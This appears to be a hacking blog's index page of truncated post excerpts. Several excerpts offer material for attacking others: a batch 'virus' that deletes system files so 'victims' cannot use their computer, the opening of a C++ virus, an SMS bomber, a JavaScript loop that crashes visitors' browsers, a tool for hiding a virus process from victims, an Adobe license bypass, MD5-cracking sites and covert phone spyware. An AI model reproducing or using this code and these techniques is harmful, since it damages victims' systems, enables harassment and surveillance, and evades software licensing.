Tracing or Routing a website using command prompt. This tip is only meant for educational purpose. I mainly use this trick to find out the hosting provider where a particular domain is hosted.
Follow the below steps:
1. Start->Run->CMD ie; open Command prompt
2. Type the following command and...
Are you getting this error while opening Photoshop CS3 or Illustrator CS3
“Product License Has Expired”
1. delete cache.db in “c:Program FilesCommon FilesAdobeAdobe PCDcache”
2. Run the adobe cs3 product
3. enter the products key for adobe cs3 product
4. set read-only attribute for “c:Program...
Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.
@echo off
@if exist c:windowssystem32mouse del c:windowssystem32mouse
@if exist...
This Post is writtern By disk0
A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You’ll need...
With more and more exploits being written in JavaScript, even some 0-day, there is a need to be able to reverse exploits written in JavaScript beyond de-obfuscation. I spent some time this weekend searching Google for a simple way to reverse JavaScript shellcode to assembly. I know people do it...
If you are the administrator of public cafe or school,this trick will be helpful for giving protection to your system. You can disable writing to USB. This will prevent from file stealing. You have to login to administrator so that you can access regedit.
Go to start . Select run.
Type as...
So far we have seen lot of keyloggers for computer. Now i am going to introduce mobile spy software to my blog visitors.
Mobile Spy is the next generation of smartphone spy software. Do you suspect that your child or employee is abusing their SMS or vehicle privileges? If yes, then this...
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.
C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{...
You may need this website. Some websites may store the password in binary format. You can view the password by decoding the Binary to ASCII. Also you can encode the ASCII character to Binary digits.
Visit:
http://www.theskull.com/javascript/ascii-binary.html
Hi this is very simple javascript code to crash the client browser. If you don’t know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there).
<script type=’javascript’>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
This code will reload the page...
MD5 is one of the famous Hash algorithm. This algorithm is used in many websites for storing the password in encrypted form. The MD5 message-digest algorithm was developed by Ronald Rivest at MIT in 1992. This algorithm takes a input message of arbitrary length and produces a 128-bit hash value...
Is your favorite website disabled the right click button? No need to worry. you can enable the Right Click button after reading this article.
There are different tools for disabling the javascript. But i will introduce again my favorite and best web delveloper tool for you. This is one of...
Good Morning Friends…!! This day will be great day! Because Break The Security get top rank in blogger directories.
Now i am going to introduce a new tool called as “CMDOW” . When you create and send virus to victim, the virus running process may be shown to victims. This tool will hide...
I have listed some website in previous posts. some of other sites listed here. List of Websites to crack the MD5 Hash Algorithm
www.tmto.org
md5.noisette.ch
md5decryption.com
www.c0llision.net
www.netmd5crack.com
www.md5decrypter.com
md5hashcracker.appspot.com
www.hashhack.com
isc.sans.edu...
You may often heard this word “MD5 Hash”. If you don’t know what it is, this post may help you. If you know about MD5 Algorithm, you can skip to Cracking MD5 Encryption Section. In this article i will explain clearly what MD5 Hash
Introduction to MD5 Algorithm:
you can refer this link...
This post is not about hacking. It just windows tweak or trick.
Just change your localhost name and enjoy it.
You have to well know about this:
How to use wamp/xamp server.
What is localhost.
It is very simple to follow. This is for windows users only.
Steps to follow:
1.Go to...